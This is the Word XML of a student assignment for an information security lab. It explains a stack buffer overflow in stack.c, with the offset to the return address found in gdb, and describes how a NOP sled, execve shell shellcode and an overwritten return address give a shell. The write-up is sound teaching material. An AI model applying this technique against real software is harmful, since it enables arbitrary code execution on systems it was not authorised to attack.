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4-Accent6"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="888"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr w:rsidR="00295F0A" w14:paraId="6CB3F17E" w14:textId="77777777" w:rsidTr="00295F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C7AD182" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A">
            <w:r>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC45314" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Roll No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00295F0A" w14:paraId="6CE91C75" w14:textId="77777777" w:rsidTr="00295F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E4456B3" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A">
            <w:r>
              <w:t>Abdul Wahab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EBEE878" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>23F-3038</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00295F0A" w14:paraId="61595400" w14:textId="77777777" w:rsidTr="00295F0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45F59EAD" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A">
            <w:r>
              <w:t>Hashim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AD53B85" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>23F-3001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37B726A2" w14:textId="13195614" w:rsidR="00295F0A" w:rsidRPr="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295F0A">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Information Security - Assignment 02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51439E54" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="00295F0A"/>
    <w:p w14:paraId="1B8528E0" w14:textId="617499F8" w:rsidR="004E3F02" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="0038206F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:t>Task 01:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7683024F" w14:textId="06511C76" w:rsidR="000B18B8" w:rsidRPr="00CF00B5" w:rsidRDefault="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF00B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB08D8" w14:textId="46719536" w:rsidR="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="151340AD" wp14:editId="30EE3E19">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>592371</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2132689</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2278049" cy="930303"/>
                <wp:effectExtent l="0" t="0" r="27305" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="1127015177" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2278049" cy="930303"/>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66AC1" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:46.65pt;margin-top:167.95pt;width:179.35pt;height:7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" filled="f" strokecolor="#e00" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B48DBE3" wp14:editId="561999E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>608275</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1822588</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1637886" cy="234564"/>
                <wp:effectExtent l="0" t="0" r="19685" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="1653341526" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1637886" cy="23456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FB1684" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:47.9pt;margin-top:143.5pt;width:128.95pt;height:18.4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" filled="f" strokecolor="#e00" strokeweight="1.5pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD0B0CB" wp14:editId="5D8527B9">
            <wp:extent cx="5943600" cy="3305810"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="23354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41514" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3305810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F057385" wp14:editId="53A26EC3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>628153</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>701454</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1586285" cy="329979"/>
                <wp:effectExtent l="0" t="0" r="13970" b="13335"/>
                <wp:wrapNone/>
                <wp:docPr id="638057224" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1586285" cy="32997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5DABD2" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:49.45pt;margin-top:55.25pt;width:124.9pt;height:2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" filled="f" strokecolor="#e00" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E729B02" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="00CF00B5" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF00B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability Analysis — stack.c Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB17857" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Where the vulnerability lives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C626890" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>The vulnerability is in the function bof():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0866EF" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>int bof(char* str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C61C1BB" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D51F3C8" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">    char buffer[12];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C02191F" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">    strcpy(buffer, str);   // &lt;-- vulnerable line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678A8F74" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE4323" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D526211" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">buffer is declared as exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12 bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">, but strcpy() copies data from str into buffer with </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no length checking whatsoever</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t>. strcpy() keeps copying bytes until it hits a null terminator (\0) in the source — it has no concept of how big the destination actually is. If str is longer than 12 bytes (and in this program it can be up to 517 bytes, since that’s the size of str in main()), the extra bytes don’t get rejected or truncated — they simply overflow past the end of buffer and overwrite whatever memory comes immediately after it on the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89038A" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">This is a classic </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stack-based buffer overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t>, and strcpy() is one of the canonical unsafe C functions that cause it (along with gets(), sprintf() without bounds, etc.) because none of them take a maximum-length argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59850C" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Why the stack layout makes this exploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851F4E0" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>When bof() is called, the x86 calling convention pushes the following onto the stack, from low to high memory, in this order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C1535" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:t>buffer[12] — the local array itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2536784F" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">The saved </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EBP</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> (old frame pointer of the caller, main()) — 4 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B23150" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>return address</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> — 4 bytes — the instruction pointer value that execution jumps back to once bof() finishes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A8FE6" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">Because buffer sits at a </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>lower</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> memory address than the saved EBP and the return address, and because strcpy() writes forward (upward in address) past the end of the buffer with no bound, an oversized input doesn’t just corrupt buffer — it keeps writing straight through the saved EBP and directly into the return address slot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F291E" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>In this binary, confirmed experimentally with gdb:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9576F" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:t>&amp;buffer = 0xffffcc74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C40F8" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:t>Saved EBP = 0xffffcc88 (sits 20 bytes after the start of buffer, due to compiler stack alignment/padding beyond the declared 12 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA56FD8" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:t>Return address = EBP + 4 = 0xffffcc8c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C06DC9" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>So the return address sits exactly 24 bytes from the start of buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E409A54" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>This means any input where byte 24 onward contains a crafted 4-byte value will overwrite the function’s return address with whatever the attacker chooses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D47FA" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. How the exploit abuses this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6F3C41" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>exploit.c builds a 517-byte file (badfile) with three components:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C675BF6" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOP sled</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> — the buffer is first filled entirely with 0x90 (the x86 no-op instruction) using memset(). A NOP sled is a “landing zone”: if the CPU starts executing anywhere inside this region, it just slides forward one harmless instruction at a time until it reaches real code. This makes the exploit tolerant of small inaccuracies in the guessed jump address — a key reason it’s used instead of requiring a byte-perfect address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FB7C0" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> — placed near the end of the buffer via memcpy(). This is raw machine code that calls execve("/bin/sh", NULL, NULL), replacing the current process image with a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B78E9E2" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overwritten return address</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> — using *(long *)(buffer + 24) = ret;, the exploit writes a crafted address directly into the 4-byte slot at offset 24, which — as shown above — is exactly where bof()’s return address lives on the stack. The value written (&amp;buffer + 60) points into the middle of the NOP sled rather than at the very start of buffer, giving some margin for small stack offset variation between separate program runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B17898" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t>stack.c’s main() reads this entire 517-byte file into str[517] with fread(), then calls bof(str). Inside bof(), strcpy(buffer, str) copies all 517 bytes into the 12-byte buffer, overflowing it exactly as designed. When bof() executes its ret instruction at the end, instead of returning control to main() as the program intended, the CPU pops the corrupted return address off the stack and jumps to it — landing in the NOP sled, sliding into the shellcode, and spawning a shell running as the user who executed ./stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C0B80" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Why this matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0214C1" w14:textId="77777777" w:rsidR="000B18B8" w:rsidRPr="000B18B8" w:rsidRDefault="000B18B8" w:rsidP="000B18B8">
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve">This demonstrates the core danger of stack buffer overflows: a program’s </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>control flow</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> (where the CPU jumps next) is stored in the same memory region as </w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attacker-controlled data</w:t>
      </w:r>
      <w:r w:rsidRPr="000B18B8">
        <w:t xml:space="preserve"> (the buffer), with no separation and no bounds enforcement. Any function that copies untrusted input into a fixed-size stack buffer without checking length is a potential vector for arbitrary code execution — not just a crash. This is precisely the class of bug that modern mitigations (stack canaries, non-executable stacks/NX, and ASLR) were built to stop, and this lab deliberately disables all three (-fno-stack-protector, -z execstack, -no-pie, randomize_va_space=0) to demonstrate the raw mechanics before those defenses are reintroduced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702079DA" w14:textId="77777777" w:rsidR="00295F0A" w:rsidRDefault="00295F0A" w:rsidP="000B18B8"/>
    <w:p w14:paraId="70805259" w14:textId="22674DCD" w:rsidR="000B18B8" w:rsidRPr="00CF00B5" w:rsidRDefault="00CF00B5" w:rsidP="000B18B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF00B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3849FB" w14:textId="7EE43234" w:rsidR="00CF00B5" w:rsidRDefault="00CF00B5" w:rsidP="000B18B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1366F1B9" wp14:editId="7E844440">
            <wp:extent cx="5943600" cy="7118252"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1742437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37303" name="Picture 1742437303"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5947165" cy="7122521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4673F660" w14:textId="77777777" w:rsidR="0038206F" w:rsidRDefault="0038206F" w:rsidP="000B18B8"/>
